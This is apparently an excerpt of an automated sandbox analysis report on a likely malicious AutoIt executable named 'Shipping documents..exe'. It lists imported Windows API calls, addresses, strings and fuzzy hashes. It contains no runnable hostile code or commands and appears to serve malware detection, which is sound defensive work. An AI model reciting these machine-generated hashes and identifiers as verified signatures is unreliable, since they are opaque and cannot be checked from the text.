• Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
APIs
• GetDesktopWindow.USER32 ref: 00472BB2
• GetDC.USER32(00000000), ref: 00472BBB
• GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
• ReleaseDC.USER32(00000000,?), ref: 00472BE8
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
• Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
• Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
• Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
APIs
• __getptd_noexit.LIBCMT ref: 00415150
  • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
  • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
  • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
  • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
  • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
• CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
• __freeptd.LIBCMT ref: 0041516B
• ExitThread.KERNEL32 ref: 00415173
Similarity
• API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
• String ID:
• API String ID: 1454798553-0
• Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
• Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
• Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
• Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
Strings
Similarity
• API ID:
• String ID: 5$^
• API String ID: 0-2698666812
• Opcode ID: 2b90f5a79bcd8015aa84be88f7575ad9d7aa639a1ab45e819a160acda22935b1
• Instruction ID: 6ee989b57c56cc683e8081b45a60e8d88641feefa2b309a8211b066407c3f2e5
• Opcode Fuzzy Hash: 2b90f5a79bcd8015aa84be88f7575ad9d7aa639a1ab45e819a160acda22935b1
• Instruction Fuzzy Hash: 82F1B4B1D00649AACB24CFA9C940AEEFBF4EF84300F14856FE455E7351E3B89A45CB56
APIs
Strings
Similarity
• API ID: _strncmp
• String ID: Q\E
• API String ID: 909875538-2189900498
• Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
• Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
• Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
• Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
APIs
• OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
  • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
  • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
Strings
Similarity
• API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
• String ID: AutoIt3GUI$Container
• API String ID: 2652923123-3941886329
• Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
• Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
• Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
• Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
APIs
Strings
Similarity
• API ID: _memmove_strncmp
• String ID: U$\
• API String ID: 2666721431-100911408
• Opcode ID: 7a2f9e98db4c3d05fd9d40de2db00db7aa6c2f6853ec4cd4a34a931cc1ec7d7c
• Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
• Opcode Fuzzy Hash: 7a2f9e98db4c3d05fd9d40de2db00db7aa6c2f6853ec4cd4a34a931cc1ec7d7c
• Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
APIs
  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
• __wcsnicmp.LIBCMT ref: 00467288
• WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
Strings
Similarity
• API ID: Connection__wcsnicmp_wcscpy_wcslen
• String ID: LPT
• API String ID: 3035604524-1350329615
• Opcode ID: d6ee32a1e65a10be59cd2aee46927f2afb98f966929ec107a83db754813dcd00
• Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
• Opcode Fuzzy Hash: d6ee32a1e65a10be59cd2aee46927f2afb98f966929ec107a83db754813dcd00
• Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
APIs
Strings
Similarity
• API ID: _memmove
• String ID: \$h
• API String ID: 4104443479-677774858
• Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
• Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
• Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
• Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
APIs
Strings
Similarity
• API ID: _memcmp
• String ID: &
• API String ID: 2931989736-1010288
• Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
• Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
• Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
• Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
APIs
Strings
Similarity
• API ID: _memmove
• String ID: \
• API String ID: 4104443479-2967466578
• Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
• Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
• Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
• Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
APIs
• _wcslen.LIBCMT ref: 00466825
• InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
Strings
                                                                                                          Similarity
                                                                                                          • API ID: CrackInternet_wcslen
                                                                                                          • String ID: |
                                                                                                          • API String ID: 596671847-2343686810
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID: '
                                                                                                          • API String ID: 3850602802-1997036262
                                                                                                          APIs
                                                                                                          • _strlen.LIBCMT ref: 0040F858
                                                                                                            • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                                                                            • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                                                                          • _sprintf.LIBCMT ref: 0040F9AE
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$_sprintf_strlen
                                                                                                          • String ID: %02X
                                                                                                          • API String ID: 1921645428-436463671
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID: Combobox
                                                                                                          • API String ID: 3850602802-2096851135
                                                                                                          APIs
                                                                                                          • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: LengthMessageSendTextWindow
                                                                                                          • String ID: edit
                                                                                                          • API String ID: 2978978980-2167791130
                                                                                                          APIs
                                                                                                          • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                                                                          • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: GlobalMemorySleepStatus
                                                                                                          • String ID: @
                                                                                                          • API String ID: 2783356886-2766056989
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: htonsinet_addr
                                                                                                          • String ID: 255.255.255.255
                                                                                                          • API String ID: 3832099526-2422070025
                                                                                                          APIs
                                                                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: InternetOpen
                                                                                                          • String ID: <local>
                                                                                                          • API String ID: 2038078732-4266983199
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: __fread_nolock_memmove
                                                                                                          • String ID: EA06
                                                                                                          • API String ID: 1988441806-3962188686
APIs
Strings
Similarity
• API ID: _memmove
• String ID: u,D
• API String ID: 4104443479-3858472334
APIs
• SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• wsprintfW.USER32 ref: 0045612A
Strings
Similarity
• API ID: MessageSend_mallocwsprintf
• String ID: %d/%02d/%02d
• API String ID: 1262938277-328681919
APIs
• InternetCloseHandle.WININET(?), ref: 00442663
• InternetCloseHandle.WININET ref: 00442668
  • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
Strings
Similarity
• API ID: CloseHandleInternet$ObjectSingleWait
• String ID: aeB
• API String ID: 857135153-906807131
APIs
Strings
• C:\Users\user\Desktop\Shipping documents..exe, xrefs: 0043324B
• ^B, xrefs: 00433248
Similarity
• API ID: _wcsncpy
• String ID: ^B$C:\Users\user\Desktop\Shipping documents..exe
• API String ID: 1735881322-869213185
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
• PostMessageW.USER32(00000000), ref: 00441C05
  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
  • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
Strings
Similarity
• API ID: Message_doexit
• String ID: AutoIt$Error allocating memory.
• API String ID: 1993061046-4017498283